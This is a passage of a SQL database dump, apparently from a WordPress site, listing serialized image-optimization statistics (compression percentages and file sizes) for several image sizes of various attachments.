lass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:18785;s:10:\"size_after\";i:18785;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:41336;s:10:\"size_after\";i:41336;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:65865;s:10:\"size_after\";i:65865;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}}}'),(4115,2507,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:6.79100363124774286660567668150179088115692138671875;s:5:\"bytes\";i:7144;s:11:\"size_before\";i:105198;s:10:\"size_after\";i:98054;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.54999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:452;s:11:\"size_before\";i:6896;s:10:\"size_after\";i:6444;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.17999999999999971578290569595992565155029296875;s:5:\"bytes\";i:591;s:11:\"size_before\";i:8231;s:10:\"size_after\";i:7640;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.519999999999999573674358543939888477325439453125;s:5:\"bytes\";i:2401;s:11:\"size_before\";i:31914;s:10:\"size_after\";i:29513;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.4000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:606;s:11:\"size_before\";i:8194;s:10:\"size_after\";i:7588;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.4199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:1289;s:11:\"size_before\";i:20065;s:10:\"size_after\";i:18776;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.04000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:1805;s:11:\"size_before\";i:29898;s:10:\"size_after\";i:28093;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4116,2506,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:4.75807566182106000951534952037036418914794921875;s:5:\"bytes\";i:3787;s:11:\"size_before\";i:79591;s:10:\"size_after\";i:75804;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.38999999999999968025576890795491635799407958984375;s:5:\"bytes\";i:377;s:11:\"size_before\";i:5899;s:10:\"size_after\";i:5522;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.7400000000000002131628207280300557613372802734375;s:5:\"bytes\";i:640;s:11:\"size_before\";i:11141;s:10:\"size_after\";i:10501;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.13999999999999968025576890795491635799407958984375;s:5:\"bytes\";i:483;s:11:\"size_before\";i:9401;s:10:\"size_after\";i:8918;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.37000000000000010658141036401502788066864013671875;s:5:\"bytes\";i:910;s:11:\"size_before\";i:20839;s:10:\"size_after\";i:19929;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.2599999999999997868371792719699442386627197265625;s:5:\"bytes\";i:1377;s:11:\"size_before\";i:32311;s:10:\"size_after\";i:30934;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4117,2505,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:6.60490024765233130210617673583328723907470703125;s:5:\"bytes\";i:5254;s:11:\"size_before\";i:79547;s:10:\"size_after\";i:74293;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.949999999999999289457264239899814128875732421875;s:5:\"bytes\";i:414;s:11:\"size_before\";i:4627;s:10:\"size_after\";i:4213;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.9900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:972;s:11:\"size_before\";i:12172;s:10:\"size_after\";i:11200;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.79999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:533;s:11:\"size_before\";i:9184;s:10:\"size_after\";i:8651;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.63999999999999968025576890795491635799407958984375;s:5:\"bytes\";i:1138;s:11:\"size_before\";i:20166;s:10:\"size_after\";i:19028;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.5800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:2197;s:11:\"size_before\";i:33398;s:10:\"size_after\";i:31201;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4118,2504,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:8.6421498383894199690757886855863034725189208984375;s:5:\"bytes\";i:13449;s:11:\"size_before\";i:155621;s:10:\"size_after\";i:142172;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.54999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:310;s:11:\"size_before\";i:4736;s:10:\"size_after\";i:4426;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.4900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:575;s:11:\"size_before\";i:7675;s:10:\"size_after\";i:7100;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.1199999999999992184029906638897955417633056640625;s:5:\"bytes\";i:3233;s:11:\"size_before\";i:35463;s:10:\"size_after\";i:32230;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.75;s:5:\"bytes\";i:5646;s:11:\"size_before\";i:57899;s:10:\"size_after\";i:52253;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.37000000000000010658141036401502788066864013671875;s:5:\"bytes\";i:448;s:11:\"size_before\";i:7032;s:10:\"size_after\";i:6584;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.4900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:1196;s:11:\"size_before\";i:15961;s:10:\"size_after\";i:14765;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.5999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:2041;s:11:\"size_before\";i:26855;s:10:\"size_after\";i:24814;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4119,2503,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:5.36198373465157107631284816307015717029571533203125;s:5:\"bytes\";i:4035;s:11:\"size_before\";i:75252;s:10:\"size_after\";i:71217;s:4:\"time\";d:0.060000000000000004718447854656915296800434589385986328125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.660000000000000142108547152020037174224853515625;s:5:\"bytes\";i:321;s:11:\"size_before\";i:4818;s:10:\"size_after\";i:4497;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.88999999999999968025576890795491635799407958984375;s:5:\"bytes\";i:753;s:11:\"size_before\";i:12784;s:10:\"size_after\";i:12031;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.6699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:492;s:11:\"size_before\";i:10532;s:10:\"size_after\";i:10040;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.3300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:1011;s:11:\"size_before\";i:23363;s:10:\"size_after\";i:22352;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.13999999999999968025576890795491635799407958984375;s:5:\"bytes\";i:1458;s:11:\"size_before\";i:23755;s:10:\"size_after\";i:22297;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4120,2502,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:6.6104125121545234122777401353232562541961669921875;s:5:\"bytes\";i:8022;s:11:\"size_before\";i:121354;s:10:\"size_after\";i:113332;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.07000000000000028421709430404007434844970703125;s:5:\"bytes\";i:353;s:11:\"size_before\";i:4990;s:10:\"size_after\";i:4637;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.53000000000000024868995751603506505489349365234375;s:5:\"bytes\";i:690;s:11:\"size_before\";i:10566;s:10:\"size_after\";i:9876;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.57000000000000028421709430404007434844970703125;s:5:\"bytes\";i:3373;s:11:\"size_before\";i:44549;s:10:\"size_after\";i:41176;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.86000000000000031974423109204508364200592041015625;s:5:\"bytes\";i:536;s:11:\"size_before\";i:9144;s:10:\"size_after\";i:8608;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.03000000000000024868995751603506505489349365234375;s:5:\"bytes\";i:1229;s:11:\"size_before\";i:20368;s:10:\"size_after\";i:19139;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.79999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:1841;s:11:\"size_before\";i:31737;s:10:\"size_after\";i:29896;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4121,2498,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:14.6381473142489557659473575768060982227325439453125;s:5:\"bytes\";i:4551;s:11:\"size_before\";i:31090;s:10:\"size_after\";i:26539;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.1099999999999994315658113919198513031005859375;s:5:\"bytes\";i:280;s:11:\"size_before\";i:2770;s:10:\"size_after\";i:2490;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.07000000000000028421709430404007434844970703125;s:5:\"bytes\";i:778;s:11:\"size_before\";i:6447;s:10:\"size_after\";i:5669;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.230000000000000426325641456060111522674560546875;s:5:\"bytes\";i:431;s:11:\"size_before\";i:3257;s:10:\"size_after\";i:2826;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.480000000000000426325641456060111522674560546875;s:5:\"bytes\";i:1224;s:11:\"size_before\";i:7002;s:10:\"size_after\";i:5778;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.8300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:1838;s:11:\"size_before\";i:11614;s:10:\"size_after\";i:9776;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4122,2497,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:12.408283452403939151054146350361406803131103515625;s:5:\"bytes\";i:5141;s:11:\"size_before\";i:41432;s:10:\"size_after\";i:36291;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.4900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:298;s:11:\"size_before\";i:3510;s:10:\"size_after\";i:3212;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.42999999999999971578290569595992565155029296875;s:5:\"bytes\";i:840;s:11:\"size_before\";i:8053;s:10:\"size_after\";i:7213;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.8499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:568;s:11:\"size_before\";i:4792;s:10:\"size_after\";i:4224;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.230000000000000426325641456060111522674560546875;s:5:\"bytes\";i:1245;s:11:\"size_before\";i:10183;s:10:\"size_after\";i:8938;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:2190;s:11:\"size_before\";i:14894;s:10:\"size_after\";i:12704;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4123,2496,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:10.148948266060262568544203531928360462188720703125;s:5:\"bytes\";i:4463;s:11:\"size_before\";i:43975;s:10:\"size_after\";i:39512;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.769999999999999573674358543939888477325439453125;s:5:\"bytes\";i:289;s:11:\"size_before\";i:3296;s:10:\"size_after\";i:3007;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.019999999999999573674358543939888477325439453125;s:5:\"bytes\";i:820;s:11:\"size_before\";i:8181;s:10:\"size_after\";i:7361;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.3900000000000005684341886080801486968994140625;s:5:\"bytes\";i:446;s:11:\"size_before\";i:5314;s:10:\"size_after\";i:4868;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.160000000000000142108547152020037174224853515625;s:5:\"bytes\";i:1130;s:11:\"size_before\";i:11120;s:10:\"size_after\";i:9990;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.07000000000000028421709430404007434844970703125;s:5:\"bytes\";i:1778;s:11:\"size_before\";i:16064;s:10:\"size_after\";i:14286;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4124,2495,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:11.05154547918983354293231968767940998077392578125;s:5:\"bytes\";i:19976;s:11:\"size_before\";i:180753;s:10:\"size_after\";i:160777;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.980000000000000426325641456060111522674560546875;s:5:\"bytes\";i:363;s:11:\"size_before\";i:4041;s:10:\"size_after\";i:3678;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.410000000000000142108547152020037174224853515625;s:5:\"bytes\";i:1003;s:11:\"size_before\";i:10657;s:10:\"size_after\";i:9654;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.6099999999999994315658113919198513031005859375;s:5:\"bytes\";i:5289;s:11:\"size_before\";i:45556;s:10:\"size_after\";i:40267;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.78999999999999914734871708787977695465087890625;s:5:\"bytes\";i:9123;s:11:\"size_before\";i:71333;s:10:\"size_after\";i:62210;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:8;s:5:\"bytes\";i:566;s:11:\"size_before\";i:7079;s:10:\"size_after\";i:6513;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.21000000000000085265128291212022304534912109375;s:5:\"bytes\";i:1357;s:11:\"size_before\";i:16521;s:10:\"size_after\";i:15164;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.9000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:2275;s:11:\"size_before\";i:25566;s:10:\"size_after\";i:23291;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4125,2494,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:9.4796263984399047330953180789947509765625;s:5:\"bytes\";i:4618;s:11:\"size_before\";i:48715;s:10:\"size_after\";i:44097;s:4:\"time\";d:0.06999999999999999278355033993648248724639415740966796875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.8699999999999992184029906638897955417633056640625;s:5:\"bytes\";i:317;s:11:\"size_before\";i:3573;s:10:\"size_after\";i:3256;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.730000000000000426325641456060111522674560546875;s:5:\"bytes\";i:839;s:11:\"size_before\";i:8627;s:10:\"size_after\";i:7788;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.86000000000000031974423109204508364200592041015625;s:5:\"bytes\";i:486;s:11:\"size_before\";i:6185;s:10:\"size_after\";i:5699;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.1199999999999992184029906638897955417633056640625;s:5:\"bytes\";i:1213;s:11:\"size_before\";i:13297;s:10:\"size_after\";i:12084;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.3499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:1763;s:11:\"size_before\";i:17033;s:10:\"size_after\";i:15270;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4126,2493,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:11.6275348071603303878873703069984912872314453125;s:5:\"bytes\";i:5086;s:11:\"size_before\";i:43741;s:10:\"size_after\";i:38655;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.3900000000000005684341886080801486968994140625;s:5:\"bytes\";i:339;s:11:\"size_before\";i:3610;s:10:\"size_after\";i:3271;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.839999999999999857891452847979962825775146484375;s:5:\"bytes\";i:912;s:11:\"size_before\";i:8411;s:10:\"size_after\";i:7499;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.0099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:513;s:11:\"size_before\";i:5124;s:10:\"size_after\";i:4611;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.910000000000000142108547152020037174224853515625;s:5:\"bytes\";i:1345;s:11:\"size_before\";i:11291;s:10:\"size_after\";i:9946;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.9199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:1977;s:11:\"size_before\";i:15305;s:10:\"size_after\";i:13328;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}}}'),(4127,2492,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:13.0976802903582125736647867597639560699462890625;s:5:\"bytes\";i:4980;s:11:\"size_before\";i:38022;s:10:\"size_after\";i:33042;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.46000000000000085265128291212022304534912109375;s:5:\"bytes\";i:289;s:11:\"size_before\";i:3056;s:10:\"size_after\";i:2767;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.6400000000000005684341886080801486968994140625;s:5:\"bytes\";i:929;s:11:\"size_before\";i:7351;s:10:\"size_after\";i:6422;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.550000000000000710542735760100185871124267578125;s:5:\"bytes\";i:513;s:11:\"size_before\";i:4442;s:10:\"size_after\";i:3929;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.1699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:1318;s:11:\"size_before\";i:10009;s:10:\"size_after\";i:8691;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.6699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:1931;s:11:\"size_before\";i:13164;s:10:\"size_after\";i:11233;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4128,2491,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:10.177479381346898890114971436560153961181640625;s:5:\"bytes\";i:10884;s:11:\"size_before\";i:106942;s:10:\"size_after\";i:96058;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.1199999999999992184029906638897955417633056640625;s:5:\"bytes\";i:224;s:11:\"size_before\";i:2758;s:10:\"size_after\";i:2534;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.0999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:520;s:11:\"size_before\";i:6423;s:10:\"size_after\";i:5903;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.7400000000000002131628207280300557613372802734375;s:5:\"bytes\";i:2521;s:11:\"size_before\";i:23467;s:10:\"size_after\";i:20946;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.3900000000000005684341886080801486968994140625;s:5:\"bytes\";i:4014;s:11:\"size_before\";i:35255;s:10:\"size_after\";i:31241;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.4900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:483;s:11:\"size_before\";i:6448;s:10:\"size_after\";i:5965;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.050000000000000710542735760100185871124267578125;s:5:\"bytes\";i:1185;s:11:\"size_before\";i:13089;s:10:\"size_after\";i:11904;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.92999999999999971578290569595992565155029296875;s:5:\"bytes\";i:1937;s:11:\"size_before\";i:19502;s:10:\"size_after\";i:17565;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4129,2490,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:18.99751316950557367135843378491699695587158203125;s:5:\"bytes\";i:14209;s:11:\"size_before\";i:74794;s:10:\"size_after\";i:60585;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.769999999999999573674358543939888477325439453125;s:5:\"bytes\";i:466;s:11:\"size_before\";i:3156;s:10:\"size_after\";i:2690;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.0799999999999982946974341757595539093017578125;s:5:\"bytes\";i